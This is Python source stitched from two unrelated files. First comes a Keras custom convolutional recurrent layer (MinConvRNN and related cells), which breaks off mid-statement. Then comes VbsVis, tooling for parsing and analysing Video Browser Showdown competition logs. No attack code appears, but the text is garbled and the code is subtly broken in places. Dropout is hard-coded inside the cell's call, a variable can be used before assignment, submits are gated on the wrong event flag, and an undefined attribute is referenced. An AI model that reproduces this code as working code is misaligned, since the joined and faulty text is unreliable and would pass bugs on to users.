self.activity_regularizer = regularizers.get(activity_regularizer)
def call(self, inputs, mask=None, training=None, initial_state=None):
return super(MinConvRNN, self).call(inputs,
mask=mask,
training=training,
initial_state=initial_state)
@property
def filters(self):
return self.cell.filters
@property
def kernel_size(self):
return self.cell.kernel_size
@property
def strides(self):
return self.cell.strides
@property
def padding(self):
return self.cell.padding
@property
def data_format(self):
return self.cell.data_format
@property
def dilation_rate(self):
return self.cell.dilation_rate
@property
def activation(self):
return self.cell.activation
@property
def recurrent_activation(self):
return self.cell.recurrent_activation
@property
def use_bias(self):
return self.cell.use_bias
@property
def kernel_initializer(self):
return self.cell.kernel_initializer
@property
def recurrent_initializer(self):
return self.cell.recurrent_initializer
@property
def bias_initializer(self):
return self.cell.bias_initializer
@property
def unit_forget_bias(self):
return self.cell.unit_forget_bias
@property
def kernel_regularizer(self):
return self.cell.kernel_regularizer
@property
def recurrent_regularizer(self):
return self.cell.recurrent_regularizer
@property
def bias_regularizer(self):
return self.cell.bias_regularizer
@property
def kernel_constraint(self):
return self.cell.kernel_constraint
@property
def recurrent_constraint(self):
return self.cell.recurrent_constraint
@property
def bias_constraint(self):
return self.cell.bias_constraint
@property
def dropout(self):
return self.cell.dropout
@property
def recurrent_dropout(self):
return self.cell.recurrent_dropout
def get_config(self):
config = {'filters': self.filters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'data_format': self.data_format,
'dilation_rate': self.dilation_rate,
'activation': activations.serialize(self.activation),
'recurrent_activation': activations.serialize(self.recurrent_activation),
'use_bias': self.use_bias,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'recurrent_initializer': initializers.serialize(self.recurrent_initializer),
'bias_initializer': initializers.serialize(self.bias_initializer),
'unit_forget_bias': self.unit_forget_bias,
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'recurrent_regularizer': regularizers.serialize(self.recurrent_regularizer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'activity_regularizer': regularizers.serialize(self.activity_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'recurrent_constraint': constraints.serialize(self.recurrent_constraint),
'bias_constraint': constraints.serialize(self.bias_constraint),
'dropout': self.dropout,
'recurrent_dropout': self.recurrent_dropout}
base_config = super(MinConvRNN, self).get_config()
del base_config['cell']
return dict(list(base_config.items()) + list(config.items()))
@classmethod
def from_config(cls, config):
return cls(**config)
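# A hedged usage sketch for MinConvRNN (shapes and hyper-parameters are
# illustrative assumptions; assumes the Keras 2.x functional API with
# channels_last 5D input of shape (batch, time, rows, cols, channels)):
#
#   from keras.models import Model
#   from keras.layers import Input
#
#   frames = Input(shape=(None, 64, 64, 1))
#   features = MinConvRNN(filters=8, kernel_size=(3, 3), padding='same',
#                         return_sequences=True)(frames)
#   model = Model(frames, features)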
class MinConvRNNCell(Layer):
def __init__(self, filters,
kernel_size,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1),
activation='tanh',
recurrent_activation='hard_sigmoid',
use_bias=True,
kernel_initializer='glorot_uniform',
recurrent_initializer='orthogonal',
bias_initializer='zeros',
unit_forget_bias=True,
kernel_regularizer=None,
recurrent_regularizer=None,
bias_regularizer=None,
kernel_constraint=None,
recurrent_constraint=None,
bias_constraint=None,
dropout=0.,
recurrent_dropout=0.,
**kwargs):
super(MinConvRNNCell, self).__init__(**kwargs)
self.filters = filters
self.kernel_size = conv_utils.normalize_tuple(kernel_size, 2, 'kernel_size')
self.strides = conv_utils.normalize_tuple(strides, 2, 'strides')
self.padding = conv_utils.normalize_padding(padding)
self.data_format = conv_utils.normalize_data_format(data_format)
self.dilation_rate = conv_utils.normalize_tuple(dilation_rate, 2, 'dilation_rate')
self.activation = activations.get(activation)
self.recurrent_activation = activations.get(recurrent_activation)
self.use_bias = use_bias
self.kernel_initializer = initializers.get(kernel_initializer)
self.recurrent_initializer = initializers.get(recurrent_initializer)
self.bias_initializer = initializers.get(bias_initializer)
self.unit_forget_bias = unit_forget_bias
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.recurrent_regularizer = regularizers.get(recurrent_regularizer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
self.recurrent_constraint = constraints.get(recurrent_constraint)
self.bias_constraint = constraints.get(bias_constraint)
if K.backend() == 'theano' and (dropout or recurrent_dropout):
warnings.warn(
'RNN dropout is no longer supported with the Theano backend '
'due to technical limitations. '
'You can either set `dropout` and `recurrent_dropout` to 0, '
'or use the TensorFlow backend.')
dropout = 0.
recurrent_dropout = 0.
self.dropout = min(1., max(0., dropout))
self.recurrent_dropout = min(1., max(0., recurrent_dropout))
self.state_size = (self.filters, self.filters)
self._dropout_mask = None
self._recurrent_dropout_mask = None
def build(self, input_shape):
if self.data_format == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
if input_shape[channel_axis] is None:
raise ValueError('The channel dimension of the inputs '
'should be defined. Found `None`.')
input_dim = input_shape[channel_axis]
kernel_shape = self.kernel_size + (input_dim, self.filters)
self.kernel_shape = kernel_shape
recurrent_kernel_shape = self.kernel_size + (self.filters, self.filters)
self.kernel = self.add_weight(shape=kernel_shape,
initializer=self.kernel_initializer,
name='kernel',
dtype="float32",
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint)
# self.kernel2 = self.add_weight(shape=recurrent_kernel_shape,
# initializer=self.kernel_initializer,
# name='kernel',
# dtype="float32",
# regularizer=self.kernel_regularizer,
# constraint=self.kernel_constraint)
bias_initializer = self.bias_initializer
self.bias = self.add_weight(shape=(self.filters ,),
name='bias',
dtype="float32",
initializer=bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint)
self.built = True
def call(self, inputs, states, training=None):
self.dropout = .3   # NOTE: hard-coded here, overriding the dropout value passed to the constructor
self._dropout_mask = _generate_dropout_mask(
K.ones_like(inputs),
self.dropout,
training=training)
inputs_dropped = inputs * self._dropout_mask
prev_output = states[0]
prev_convIn = states[1]
# FOR <NAME>:
# the best addconv:
convIn = self.input_conv(inputs_dropped, self.kernel, b=self.bias, padding=self.padding)
in_sum = convIn + prev_convIn
output = self.activation(in_sum)
# output = in_sum
# convIn = self.input_conv(inputs, self.kernel, b=self.bias, padding=self.padding)
# in_sum = convIn + self.recurrent_conv(prev_output, self.kernel2)
# output = self.activation(in_sum)
return output, [output, in_sum]
def input_conv(self, x, w, b=None, padding='valid'):
conv_out = K.conv2d(x, w, strides=self.strides,
padding=padding,
data_format=self.data_format,)
if b is not None:
conv_out = K.bias_add(conv_out, b,
data_format=self.data_format)
return conv_out
def recurrent_conv(self, x, w):
conv_out = K.conv2d(x, w, strides=(1, 1),
padding='same',
data_format=self.data_format)
return conv_out
def get_config(self):
config = {'filters': self.filters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'data_format': self.data_format,
'dilation_rate': self.dilation_rate,
'activation': activations.serialize(self.activation),
'recurrent_activation': activations.serialize(self.recurrent_activation),
'use_bias': self.use_bias,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'recurrent_initializer': initializers.serialize(self.recurrent_initializer),
'bias_initializer': initializers.serialize(self.bias_initializer),
'unit_forget_bias': self.unit_forget_bias,
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'recurrent_regularizer': regularizers.serialize(self.recurrent_regularizer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'recurrent_constraint': constraints.serialize(self.recurrent_constraint),
'bias_constraint': constraints.serialize(self.bias_constraint),
'dropout': self.dropout,
'recurrent_dropout': self.recurrent_dropout}
base_config = super(MinConvRNNCell, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def compute_output_shape(self, input_shape):
return input_shape[:-1] + (self.filters,)
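# The recurrence implemented by MinConvRNNCell.call above, written out
# explicitly (s is the running pre-activation carried in states[1]):
#
#   s_t = conv(x_t; W) + b + s_{t-1}
#   h_t = activation(s_t)
#
# i.e. the cell accumulates convolved inputs over time and only then applies
# the nonlinearity; there is no learned recurrent kernel in this variant
# (the commented-out kernel2 lines sketch that alternative).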
class MinConvRNNTrainableHidden(ConvRNN2D):
@interfaces.legacy_convlstm2d_support
def __init__(self, filters,
kernel_size,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1),
activation='hard_sigmoid',
recurrent_activation='hard_sigmoid',
use_bias=True,
kernel_initializer='glorot_uniform',
recurrent_initializer='orthogonal',
bias_initializer='zeros',
unit_forget_bias=True,
kernel_regularizer=None,
recurrent_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
recurrent_constraint=None,
bias_constraint=None,
return_sequences=False,
go_backwards=False,
stateful=False,
dropout=0.,
recurrent_dropout=0.,
**kwargs):
cell = MinConvRNNTrainableHiddenCell(filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
activation=activation,
recurrent_activation=recurrent_activation,
use_bias=use_bias,
kernel_initializer=kernel_initializer,
recurrent_initializer=recurrent_initializer,
bias_initializer=bias_initializer,
unit_forget_bias=unit_forget_bias,
kernel_regularizer=kernel_regularizer,
recurrent_regularizer=recurrent_regularizer,
bias_regularizer=bias_regularizer,
kernel_constraint=kernel_constraint,
recurrent_constraint=recurrent_constraint,
bias_constraint=bias_constraint,
dropout=dropout,
recurrent_dropout=recurrent_dropout)
super(MinConvRNNTrainableHidden, self).__init__(cell,
return_sequences=return_sequences,
go_backwards=go_backwards,
stateful=stateful,
**kwargs)
self.activity_regularizer = regularizers.get(activity_regularizer)
def call(self, inputs, mask=None, training=None, initial_state=None):
return super(MinConvRNNTrainableHidden, self).call(inputs,
mask=mask,
training=training,
initial_state=initial_state)
@property
def filters(self):
return self.cell.filters
@property
def kernel_size(self):
return self.cell.kernel_size
@property
def strides(self):
return self.cell.strides
@property
def padding(self):
return self.cell.padding
@property
def data_format(self):
return self.cell.data_format
@property
def dilation_rate(self):
return self.cell.dilation_rate
@property
def activation(self):
return self.cell.activation
@property
def recurrent_activation(self):
return self.cell.recurrent_activation
@property
def use_bias(self):
return self.cell.use_bias
@property
def kernel_initializer(self):
return self.cell.kernel_initializer
@property
def recurrent_initializer(self):
return self.cell.recurrent_initializer
@property
def bias_initializer(self):
return self.cell.bias_initializer
@property
def unit_forget_bias(self):
return self.cell.unit_forget_bias
@property
def kernel_regularizer(self):
return self.cell.kernel_regularizer
@property
def recurrent_regularizer(self):
return self.cell.recurrent_regularizer
@property
def bias_regularizer(self):
return self.cell.bias_regularizer
@property
def kernel_constraint(self):
return self.cell.kernel_constraint
@property
def recurrent_constraint(self):
return self.cell.recurrent_constraint
@property
def bias_constraint(self):
return self.cell.bias_constraint
@property
def dropout(self):
return self.cell.dropout
@property
def recurrent_dropout(self):
return self.cell.recurrent_dropout
def get_config(self):
config = {'filters': self.filters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'data_format': self.data_format,
'dilation_rate': self.dilation_rate,
'activation': activations.serialize(self.activation),
'recurrent_activation': activations.serialize(self.recurrent_activation),
'use_bias': self.use_bias,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'recurrent_initializer': initializers.serialize(self.recurrent_initializer),
'bias_initializer': initializers.serialize(self.bias_initializer),
'unit_forget_bias': self.unit_forget_bias,
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'recurrent_regularizer': regularizers.serialize(self.recurrent_regularizer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'activity_regularizer': regularizers.serialize(self.activity_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'recurrent_constraint': constraints.serialize(self.recurrent_constraint),
'bias_constraint': constraints.serialize(self.bias_constraint),
'dropout': self.dropout,
'recurrent_dropout': self.recurrent_dropout}
base_config = super(MinConvRNNTrainableHidden, self).get_config()
del base_config['cell']
return dict(list(base_config.items()) + list(config.items()))
@classmethod
def from_config(cls, config):
return cls(**config)
class MinConvRNNTrainableHiddenCell(Layer):
def __init__(self, filters,
kernel_size,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1),
activation='tanh',
recurrent_activation='hard_sigmoid',
use_bias=True,
kernel_initializer='glorot_uniform',
recurrent_initializer='orthogonal',
bias_initializer='zeros',
unit_forget_bias=True,
kernel_regularizer=None,
recurrent_regularizer=None,
bias_regularizer=None,
kernel_constraint=None,
recurrent_constraint=None,
bias_constraint=None,
dropout=0.,
recurrent_dropout=0.,
**kwargs):
super(MinConvRNNTrainableHiddenCell, self).__init__(**kwargs)
self.filters = filters
self.kernel_size = conv_utils.normalize_tuple(kernel_size, 2, 'kernel_size')
self.strides = conv_utils.normalize_tuple(strides, 2, 'strides')
self.padding = conv_utils.normalize_padding(padding)
self.data_format = conv_utils.normalize_data_format(data_format)
self.dilation_rate = conv_utils.normalize_tuple(dilation_rate, 2, 'dilation_rate')
self.activation = activations.get(activation)
self.recurrent_activation = activations.get(recurrent_activation)
self.use_bias = use_bias
self.kernel_initializer = initializers.get(kernel_initializer)
self.recurrent_initializer = initializers.get(recurrent_initializer)
self.bias_initializer = initializers.get(bias_initializer)
self.unit_forget_bias = unit_forget_bias
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.recurrent_regularizer = regularizers.get(recurrent_regularizer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
self.recurrent_constraint = constraints.get(recurrent_constraint)
self.bias_constraint = constraints.get(bias_constraint)
if K.backend() == 'theano' and (dropout or recurrent_dropout):
warnings.warn(
'RNN dropout is no longer supported with the Theano backend '
'due to technical limitations. '
'You can either set `dropout` and `recurrent_dropout` to 0, '
'or use the TensorFlow backend.')
dropout = 0.
recurrent_dropout = 0.
self.dropout = min(1., max(0., dropout))
self.recurrent_dropout = min(1., max(0., recurrent_dropout))
self.state_size = (self.filters, self.filters)
self._dropout_mask = None
self._recurrent_dropout_mask = None
def build(self, input_shape):
if self.data_format == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
if input_shape[channel_axis] is None:
raise ValueError('The channel dimension of the inputs '
'should be defined. Found `None`.')
input_dim = input_shape[channel_axis]
kernel_shape = self.kernel_size + (input_dim, self.filters)
self.kernel_shape = kernel_shape
recurrent_kernel_shape = self.kernel_size + (self.filters, self.filters)
self.kernel = | |
# =========================================================================
# VBS log-analysis tooling (VbsVis)
# =========================================================================
import numpy as np
import json
import os
import matplotlib.pyplot as plt
import seaborn as sb
import shutil
import csv  # used by get_relevance_feedback_transitions
import pprint
pp = pprint.PrettyPrinter(indent=4)
# ---
import config
from constants import *
import utils
from raw_log_types import *
from results import *
from tasks import *
from task_results import *
from submits import *
from summary import *
class VbsVis:
def __init__(self):
# Load cached if available
cached_file = os.path.join(config.cache_dir(), "vbs.pkl")
if (os.path.exists(cached_file)):
print(f"Loading cached instance from {cached_file}...")
cached_instance = utils.load_obj(cached_file)
# pp.pprint(vars(cached_instance))
self.verbose = cached_instance.verbose
self._rewrite = cached_instance._rewrite
self._tasks = cached_instance._tasks
self._raw_summaries = cached_instance._raw_summaries
self._summaries = cached_instance._summaries
self._results = cached_instance._results
self._task_results = cached_instance._task_results
self._verdicts = cached_instance._verdicts
# Else load everything
else:
self.verbose = False
self._rewrite = False
self._tasks = TaskDefs.parse_tasks(config.TASKS_JSON,
config.TASKS_STARTS,
config.TASK_MAPPING,
config.thumbs_list_filepath(),
verbose=self.verbose)
self._verdicts = Verdicts(config.VERDICT_FILEPATH)
self._raw_summaries = RawSummaries()
self._summaries = Summaries(self._tasks)
self._results = Results()
self._task_results = TaskResults(self._tasks)
# --- Getters/setters
def raw_summaries(self) -> Summaries:
return self._raw_summaries
def summaries(self) -> Summaries:
return self._summaries
def task_submits(self) -> dict:
return self._task_results._submits
def task_results(self) -> TaskResults:
return self._task_results
def results(self) -> Results:
return self._results
def tasks(self) -> TaskDefs:
return self._tasks
def get_relevance_feedback_transitions(self, teams=None, users=None, tasks=None,
time=(0.0, 99999.0), timestamp=(0, 16242180131780), all=True,
file=None, file2=None, file_all=None, max=1154038
):
# ANY-> liked
any2liked = []
# liked-> liked
liked2liked = []
for team, team_dict in self.summaries().summaries().items():
if ((teams != None) and (not (team in teams))):
continue
for user, task_actions in team_dict.items():
if ((users != None) and (not (user in users))):
continue
for task_name, actions in task_actions.items():
if ((tasks != None) and (not (task_name in tasks))):
continue
task_results = self.task_results().task_results(team, user, task_name, time, timestamp)
prev = None
prev_changed = []
for r in task_results:
changed = r.c_changed()
pos_vid, pos_frame, _ = r.positions()
unpos_vid,unpos_frame, _ = prev.positions() if (prev != None) else (max, max, 0)
if (pos_vid == None):
continue
if "LK" in changed and len(changed) == 1 and (not "NN" in prev_changed):
if (not "LK" in prev_changed):
trans = f"{prev_changed} -> {changed}"
any2liked.append([r.timestamp(), user, pos_vid, pos_frame, unpos_vid, unpos_frame, trans])
else:
if all:
liked2liked.append([r.timestamp(), user, pos_vid, pos_frame, unpos_vid, unpos_frame, trans])
prev = r
prev_changed = changed
if (file!= None):
with open(file, "w", newline="") as ofs:
writer = csv.writer(ofs, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
writer.writerow(["ID","user","pos_video","pos_frame","unpos_video","unpos_frame"])
for x in any2liked:
writer.writerow(x)
if (file2!= None):
with open(file2, "w", newline="") as ofs:
writer = csv.writer(ofs, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
writer.writerow(["ID","user","pos_video","pos_frame","unpos_video","unpos_frame"])
for x in liked2liked:
writer.writerow(x)
if (file_all!= None):
with open(file_all, "w", newline="") as ofs:
writer = csv.writer(ofs, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
writer.writerow(["ID","user","pos_video","pos_frame","unpos_video","unpos_frame"])
for x in any2liked:
writer.writerow(x)
for x in liked2liked:
writer.writerow(x)
return any2liked + liked2liked
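# A hedged usage sketch for the query above (team names and output paths are
# hypothetical, not taken from the logs):
#
#   vbs = VbsVis()
#   rows = vbs.get_relevance_feedback_transitions(
#       teams=["team_A"],
#       file="any2liked.csv", file2="liked2liked.csv",
#       file_all="all_transitions.csv")
#   # each row: [timestamp, user, pos_video, pos_frame,
#   #            unpos_video, unpos_frame, transition]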
# --- Printers
def print_task_course(self, teams=None, users=None, tasks=None, time=(0.0, 99999.0), timestamp=(0, 16242180131780), events=["r", "s", "a"]):
print("***############################***")
print("***###*** TASK COURSES ***###***")
print("***############################***")
for team, team_dict in self.summaries().summaries().items():
if ((teams != None) and (not (team in teams))):
continue
print(f"--- {team} ---")
for user, task_actions in team_dict.items():
if ((users != None) and (not (user in users))):
continue
print(f"\t--- {user} ---")
for task_name, actions in task_actions.items():
if ((tasks != None) and (not (task_name in tasks))):
continue
print(f"\t\t--- {task_name} ---\n")
actions = []
if ("a" in events):
actions = list(map(lambda x: (x.elapsed(), x), self.summaries().summary(team, user, task_name, time, timestamp)))
task_results = []
if ("r" in events):
task_results = list(map(lambda x: (x.elapsed(), x), self.task_results().task_results(team, user, task_name, time, timestamp)))
submits = []
if ("s" in events):
submits = list(map(lambda x: (x.elapsed(), x), self.task_results().task_submits(team, user, task_name, time, timestamp)))
all = sorted(actions + submits + task_results, key= lambda x: x[0])
for _, event in all:
# every event type is printed the same way
print(event)
def task_course(self, team, user, task_name, time=(0.0, 99999.0), timestamp=(0, 16242180131780), events=["r", "s", "a"]):
actions = []
if "a" in events:
actions = list(map(lambda x: (x.elapsed(), x), self.summaries().summary(team, user, task_name, time, timestamp)))
task_results = []
if "r" in events:
task_results = list(map(lambda x: (x.elapsed(), x), self.task_results().task_results(team, user, task_name, time, timestamp)))
submits = []
if "r" in events:
submits = list(map(lambda x: (x.elapsed(), x), self.task_results().task_submits(team, user, task_name, time, timestamp)))
all = sorted(actions + submits + task_results, key= lambda x: x[0])
return all
def task_actions_array(self, team, user, task_name, time=(0.0, 99999.0), timestamp=(0, 16242180131780)):
times = []
types = []
actions = self.task_course(team, user, task_name, time, timestamp, events=["a"])
for el, a in actions:
times.append(a.elapsed())
types.append(a.action())
return times, types
def print_tasks(self, tasks=None):
self._tasks.print(tasks)
def task_to_CSV(self, file):
self._tasks.to_CSV(file)
def print_results(self, team, user, fr, to):
self.results().print_results(team, user, fr, to)
def print_tool_features(self, teams=None):
self.task_results().print_features(teams)
def print_summary(self, teams=None, users=None, tasks=None, time=(0.0, 99999.0), timestamp=(0, 16242180131780)):
self.summaries().print(teams, users, tasks, time, timestamp)
def print_task_results(self, teams=None, users=None, tasks=None):
self.task_results().print(teams, users, tasks)
def print_task_results_arrays(self, teams=None, users=None, tasks=None):
self.task_results().print_arrays(teams, users, tasks)
def print_task_submits(self, teams=None, users=None, tasks=None):
self.task_results().print_submits(teams, users, tasks)
def print_task_submits_arrays(self, teams=None, users=None, tasks=None):
self.task_results().print_submits_arrays(teams, users, tasks)
def print_queries(self):
for q in config.queries():
print(q)
# --- Statics
@staticmethod
def help():
print("<<< ###################### >>>")
print("<<< ### VBS Viz ### >>>")
print("<<< ###################### >>>\n")
print("INFO QUERIES:\n")
print("vbs.print_tasks()")
print("\t Prints the overview of the tasks that were presented.")
print("PLOTS:\n")
print("vbs.plot_timelines()")
print("\t Plots timelines for all parsed teams/users/tasks.")
@staticmethod
def cache(instance):
cached_file = os.path.join(config.cache_dir(), "vbs.pkl")
utils.save_obj(cached_file, instance)
print(f"Instance cached to {cached_file}...")
@staticmethod
def flush_cache():
cache_dir = config.cache_dir()
try:
shutil.rmtree(cache_dir)
except OSError:
print(f'Error while deleting directory {cache_dir}')
# ---
def parse_team(self,
team_name: str,
team_names: list,
verbose=False,
rewrite=False,
validate_fix=False,
generate_DRES=False,
validate_diff=False):
self.verbose = verbose
self._rewrite = rewrite
print("==============\nTEAM: {}\n".format(team_name))
if (team_name in self.task_results().task_results()):
print("??? This team is already parsed. Cached maybe? ???")
return
### main()
if (validate_fix):
self.validate_and_fix_input_data(team_name, team_names)
if (validate_diff):
self.calculate_server_ts_diff(team_name, team_names)
if (generate_DRES):
self.generate_DRES_logs(team_name, team_names)
self.parse_logs(team_name, team_names)
###
self.verbose = False
self._rewrite = False
def parse_logs(self, team_name: str, team_names: list):
print("%%% PARSING %%%")
for user_name in team_names:
path = config.path(user_name)
print("---\n+++ {} +++ \nDATA: {} \n".format(user_name, path))
self.parse_user_submits(team_name, user_name, path)
for user_name in team_names:
print("---\n+++ {} +++ \nDATA: {} \n".format(user_name, path))
path = config.path(user_name)
self.parse_user_summary(team_name, user_name, path, self.task_submits())
self.parse_user_results(team_name, user_name, path, self.task_submits(), self.summaries())
print("%%% DONE! %%%")
def validate_and_fix_input_data(self, team_name: str, team_names: list):
print("%%% VALIDATING & FIXING %%%")
for user_name in team_names:
path = config.path(user_name)
print("---\n\t +++ {} +++ \n\tDATA: {} \n".format(user_name, path))
self.parsed[team_name] = self.validate_user(user_name, path)
print("%%% DONE! %%%")
def calculate_server_ts_diff(self, team_name: str, team_names: list):
print("%%% CALCULATING SERVER TS DIFF %%%")
diffs = []
for user_name in team_names:
path = config.path(user_name)
print("---\n\t +++ {} +++ \n\tDATA: {} \n".format(user_name, path))
ds = self.calculate_server_ts_diff_for_user(user_name, path)
diffs.append(ds)
#pp.pprint(diffs)
mins = []
for dfs in diffs:
mins.append(np.min(np.array(dfs)))
i = 0
for user_name in team_names:
print("DIFF MIN FOR {}: {}".format(user_name, mins[i]))
i += 1
print("%%% DONE! %%%")
return mins
def parse_user_submits(self, team, user_name, path):
print("\t--- PARSING SUBMITS. ---")
dir = config.dir_names()["requests"]
full_path = os.path.join(path, dir)
submits = []
for filename in os.listdir(full_path):
if not (filename.endswith("submit.json")):
continue
log = JsonLog.parse_file(full_path, filename)
submits += log
us = UserSubmits(submits)
self._task_results.push_user_submits(team, user_name, us, self._verdicts)
print("\t--- DONE. ---")
def parse_user_results(self, team, user_name, path, submits, summaries : Summaries):
print("\t--- PARSING TASK RESULTS. ---")
dir = config.dir_names()["results"]
full_path = os.path.join(path, dir)
results = []
for filename in os.listdir(full_path):
log = JsonLog.parse_file(full_path, filename)
results += log
r = UserResults(results)
#self._results.push_user_results(team, user_name, r)
self._task_results.push_user_results(team, user_name, r, submits, summaries)
print("\t--- DONE. ---")
def parse_user_summary(self, team, user_name, path, submits):
print("\t--- PARSING SUMMARY. ---")
dir = config.dir_names()["summary"]
full_path = os.path.join(path, dir)
summary_logs = []
for filename in os.listdir(full_path):
log = SummaryLog.parse_file(full_path, filename)
summary_logs += log.data()
self.raw_summaries().push_user_summary(team, user_name, summary_logs)
self.summaries().push_user_summary(team, user_name, summary_logs, submits)
print("\t--- DONE. ---")
def generate_DRES_logs(self, team_name: str, team_names: list):
print("%%% GENERATING DRES LOG FILES %%%")
for user_name in team_names:
path = config.path(user_name)
print("---\n\t +++ {} +++ \n\tDATA: {} \n".format(user_name, path))
self.generate_DRES_results_for_user(team_name, user_name, path)
print("%%% DONE! %%%")
def calculate_server_ts_diff_for_user(self, user_name, path):
dir = config.dir_names()["actions"]
diffs = []
if (self.verbose):
print("\t--- DIR: {} ---".format(dir))
full_path = os.path.join(path, dir)
for filename in os.listdir(full_path):
actions = JsonLog.parse_file(full_path, filename)
for a in actions:
ser_ts = a["metadata"]["serverTimestamp"]
loc_ts = a["metadata"]["timestamp"]
diff = ser_ts - loc_ts
if ser_ts < 10000:
continue
diffs.append(diff)
if (self.verbose):
print("\t--- DONE. ---")
return diffs
def generate_DRES_results_for_user(self, team_name, user_name, path):
dir = config.dir_names()["requests"]
out_dir = config.out_dir("dres")
if (self.verbose):
print("\t--- DIR: {} ---".format(dir))
print("\t--- OUT: {} ---".format(out_dir))
full_path = os.path.join(path, dir)
# For